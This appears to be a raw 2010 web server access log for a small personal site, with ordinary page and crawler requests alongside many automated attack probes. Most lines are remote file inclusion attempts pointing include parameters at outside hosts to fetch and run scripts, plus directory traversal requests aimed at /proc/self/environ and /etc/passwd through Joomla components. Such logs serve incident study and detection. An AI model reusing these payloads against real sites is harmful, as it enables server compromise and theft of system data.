174.133.201.194 - - [19/May/2010:05:53:08 -0500] "GET /logs/access_log.1265673600//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:53:08 -0500] "GET /logs//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:05:53:08 -0500] "GET /logs/access_log.1264636800//inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [19/May/2010:05:53:21 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
94.23.20.123 - - [19/May/2010:05:53:24 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
114.108.151.149 - - [19/May/2010:05:53:26 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:53:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:53:27 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.20.123 - - [19/May/2010:05:53:48 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:53:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:53:49 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:55:43 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
114.108.151.149 - - [19/May/2010:05:56:31 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:56:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:56:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
111.67.9.133 - - [19/May/2010:05:57:43 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
114.108.151.149 - - [19/May/2010:05:58:42 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [19/May/2010:05:59:24 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
111.67.9.133 - - [19/May/2010:05:59:55 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
114.108.151.149 - - [19/May/2010:06:00:56 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:06:01:06 -0500] "GET /logs/access_log.1255478400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.145 - - [19/May/2010:06:01:06 -0500] "GET /logs/access_log.1194912000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [19/May/2010:06:03:50 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:06:07:57 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:06:07:57 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:06:08:58 -0500] "GET //tiny_includes/config.php?dir_ws=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:06:08:58 -0500] "GET /logs//tiny_includes/config.php?dir_ws=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
64.128.80.17 - - [19/May/2010:06:10:06 -0500] "GET /errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:10:06 -0500] "GET //errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:11:01 -0500] "GET /logs/access_log.1270512000/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:11:01 -0500] "GET //errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:11:01 -0500] "GET /logs//errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
81.3.154.94 - - [19/May/2010:06:11:49 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:50 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:50 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:50 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:50 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:50 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:50 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:51 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:51 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:51 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:51 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:51 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:11:51 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
81.3.154.94 - - [19/May/2010:06:12:29 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 MRA 5.5 (build 02842) Firefox/3.5.9 sputnik unknown"
94.23.20.123 - - [19/May/2010:06:12:48 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:06:12:49 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.250.255.243 - - [19/May/2010:06:12:52 -0500] "GET /logs/access_log.1189987200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/May/2010:06:13:15 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.128.80.17 - - [19/May/2010:06:15:37 -0500] "GET /logs/access_log.1272844800/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:15:37 -0500] "GET //errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:15:38 -0500] "GET /logs//errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:06:17:33 -0500] "GET /logs/access_log.1273276800/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
111.67.9.133 - - [19/May/2010:06:18:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
94.125.182.40 - - [19/May/2010:06:22:26 -0500] "GET /logs/access_log.1265155200content.php?inc=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:06:22:27 -0500] "GET /content.php?inc=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:06:22:27 -0500] "GET /logs/content.php?inc=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
124.0.74.195 - - [19/May/2010:06:25:35 -0500] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.74.195 - - [19/May/2010:06:25:35 -0500] "GET /logs/styles/internal/header.php?tpl_pgb_moddir=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.0.74.195 - - [19/May/2010:06:25:35 -0500] "GET /logs/access_log.1262563200/styles/internal/header.php?tpl_pgb_moddir=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.0.74.195 - - [19/May/2010:06:25:40 -0500] "GET /logs/access_log.1270512000/styles/internal/header.php?tpl_pgb_moddir=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:06:28:52 -0500] "GET /logs/access_log.1266883200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.125.182.40 - - [19/May/2010:06:29:31 -0500] "GET /logs/access_log.1264032000content.php?inc=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
207.46.13.44 - - [19/May/2010:06:29:36 -0500] "GET /logs/access_log.1271203200 HTTP/1.1" 200 497444 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.52.154 - - [19/May/2010:06:33:02 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.52.154 - - [19/May/2010:06:33:02 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
111.89.128.186 - - [19/May/2010:06:34:37 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
111.89.128.186 - - [19/May/2010:06:34:38 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
216.127.70.140 - - [19/May/2010:06:35:57 -0500] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:06:35:57 -0500] "GET /logs/access_log.1265155200//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:06:35:57 -0500] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
64.34.173.211 - - [19/May/2010:06:39:53 -0500] "GET /!scanhttp://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.830"
64.34.173.211 - - [19/May/2010:06:39:54 -0500] "GET /logs/!scanhttp://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.830"
87.250.255.243 - - [19/May/2010:06:40:17 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
111.89.128.186 - - [19/May/2010:06:40:45 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
111.89.128.186 - - [19/May/2010:06:40:45 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
111.67.9.133 - - [19/May/2010:06:41:35 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
216.127.70.140 - - [19/May/2010:06:41:39 -0500] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:06:41:45 -0500] "GET /logs/access_log.1270944000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:06:41:45 -0500] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:06:41:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
216.127.70.140 - - [19/May/2010:06:41:53 -0500] "GET /logs/access_log.1265760000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
94.125.182.40 - - [19/May/2010:06:46:20 -0500] "GET /logs/access_log.1265155200content.php?inc=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:06:46:20 -0500] "GET /content.php?inc=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:06:46:21 -0500] "GET /logs/content.php?inc=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
111.67.9.133 - - [19/May/2010:06:48:30 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:06:48:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:06:48:47 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:06:50:31 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:06:51:02 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.89.128.186 - - [19/May/2010:06:52:42 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
111.89.128.186 - - [19/May/2010:06:52:42 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
94.125.182.40 - - [19/May/2010:06:53:46 -0500] "GET /logs/access_log.1264032000content.php?inc=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
207.46.199.180 - - [19/May/2010:06:53:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.86 - - [19/May/2010:06:54:06 -0500] "GET /logs/access_log.1202342400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:06:55:42 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
194.17.7.160 - - [19/May/2010:06:56:37 -0500] "GET /logs/access_log.1272844800//main.php?sayfa=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:06:56:37 -0500] "GET //main.php?sayfa=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:06:56:39 -0500] "GET /logs//main.php?sayfa=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:06:58:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
194.17.7.160 - - [19/May/2010:06:59:00 -0500] "GET /logs/access_log.1272844800%20%20//main.php?sayfa=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:06:59:00 -0500] "GET //main.php?sayfa=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:06:59:00 -0500] "GET /logs//main.php?sayfa=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.13.144 - - [19/May/2010:06:59:06 -0500] "GET /logs/access_log.1210204800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [19/May/2010:06:59:53 -0500] "GET /logs/access_log.1222473600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
111.67.9.133 - - [19/May/2010:07:02:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:02:28 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:02:28 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:04:12 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
209.200.252.2 - - [19/May/2010:07:04:22 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
209.200.252.2 - - [19/May/2010:07:04:22 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
87.250.255.243 - - [19/May/2010:07:07:16 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
64.128.80.17 - - [19/May/2010:07:08:50 -0500] "GET /logs/access_log.1271376000/atom.php5?page=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:07:08:50 -0500] "GET //atom.php5?page=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:07:08:50 -0500] "GET /logs//atom.php5?page=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:07:09:02 -0500] "GET /logs/access_log.1265068800/atom.php5?page=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.127.70.140 - - [19/May/2010:07:09:25 -0500] "GET //lib/language.php?_LIB_DIR=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:07:09:26 -0500] "GET /logs//lib/language.php?_LIB_DIR=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:07:09:26 -0500] "GET /logs/access_log.1264636800//lib/language.php?_LIB_DIR=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:07:10:21 -0500] "GET /logs/access_log.1262563200//lib/language.php?_LIB_DIR=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.71.1.68 - - [19/May/2010:07:15:24 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.71.1.68 - - [19/May/2010:07:15:25 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:07:18:47 -0500] "GET /logs/access_log.1252195200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
111.67.9.133 - - [19/May/2010:07:19:04 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:19:15 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:07:19:16 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
207.46.199.43 - - [19/May/2010:07:20:06 -0500] "GET /logs/access_log.1258156800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.17.7.160 - - [19/May/2010:07:21:08 -0500] "GET /logs/access_log.1273363200%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:21:08 -0500] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
194.17.7.160 - - [19/May/2010:07:21:08 -0500] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:41 -0500] "GET //skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:43 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:07:21:48 -0500] "GET //skin/zero_vote/error.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
